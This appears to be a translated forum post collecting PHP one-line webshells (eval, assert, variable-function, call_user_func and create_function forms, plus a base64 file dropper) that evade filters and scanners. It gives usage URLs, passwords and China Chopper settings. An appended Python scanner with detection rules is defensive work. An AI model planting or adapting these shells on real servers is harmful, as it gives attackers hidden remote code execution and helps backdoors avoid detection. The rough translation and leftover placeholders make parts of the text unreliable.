Eval blocking is often encountered during penetration testing, so this form will be intercepted:
<?php eval($_POST[xiao])?>
It commonly becomes:
base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)
This form can bypass the block, and there are other forms:
<?php $_GET['eval']($_POST['xiao']);?>
Today I saw something strange: Web Anti-Virus V1.0. I wonder if anyone is involved with the cloud.
This is a webshell scanning tool. To keep their web backdoors alive and avoid discovery, some of my predecessors have used compression, encryption, character reversal, and one-line ("single sentence") shells.
Some time ago, the cnqing blog also posted one:
Many people have discussed it, and some feel the same as I do: PHP backdoors are hard to prevent. In fact, the key lies in the rules. Proactive scanning also follows established rules.
I also posted one, which belongs to the sneaky school.
if (key($_GET) == 'singyea') call_user_func($_GET['singyea'], $_POST['singyea']);
Okay. Usage:
http://www.bkjia.com/shell.php?singyea=assert
Client: kitchen knife (China Chopper)
<?php $_GET['a']($_POST['B']);?>
test.php?a=assert
Password: B
<?php assert($_POST[s]);?>
<?php $_POST['iso']($_POST['cmd']);?>
Password: cmd. Kitchen knife configuration information: <O>iso=assert</O>
<?php
$S = create_function('', $_REQUEST['C']);
$S();
// S.php?C=eval%28$_REQUEST[cmd]%29;&cmd=echo%201;
?>
<?php file_put_contents(base64_decode(file name), base64_decode(pony base64));?>
Not explained
Author: rootc4 Free sharing Group
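
Since the post says the key lies in the rules, here is an added example (not from the original post or from the scanner it mentions) of rule-based detection covering the forms listed above, including a look inside base64 literals. The rule names and the sample files are constructed for illustration.

```python
import base64
import binascii
import re

SG = r"\$_(?:GET|POST|REQUEST|COOKIE)"  # request superglobals
RULES = {  # rule names are made up for this example
    "eval-or-assert-on-request-input": re.compile(
        rf"\b(?:eval|assert)\s*\(\s*{SG}", re.I),
    "request-value-used-as-function-name": re.compile(
        rf"{SG}\s*\[[^\]]*\]\s*\(", re.I),
    "callback-built-from-request-input": re.compile(
        rf"\b(?:call_user_func(?:_array)?|create_function)\s*\([^;]*{SG}", re.I),
    "file-write-of-decoded-data": re.compile(
        r"\bfile_put_contents\s*\([^;]*base64_decode", re.I),
}
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def scan(source, depth=0):
    """Return sorted names of matching rules, also checking decoded base64 literals."""
    hits = {name for name, rx in RULES.items() if rx.search(source)}
    if depth < 2:  # bounded recursion: encoded payloads may be nested
        for blob in B64_LITERAL.findall(source):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64, or not text: nothing to inspect
            hits |= {f"base64:{h}" for h in scan(decoded, depth + 1)}
    return sorted(hits)


# Constructed sample files, modelled on the forms shown in the post.
SAMPLES = {
    "direct.php": "<?php assert($_POST['s']); ?>",
    "varfunc.php": "<?php $_GET['a']($_POST['b']); ?>",
    "callback.php": "<?php $f = create_function('', $_REQUEST['c']); $f(); ?>",
    "encoded.php": "<?php $x = base64_decode('%s'); ?>"
    % base64.b64encode(b"<?php eval($_POST['k']); ?>").decode(),
    "benign.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan(src) or "clean")
```

Rules like these match only the forms they name, so a file that trips none of them is not thereby clean.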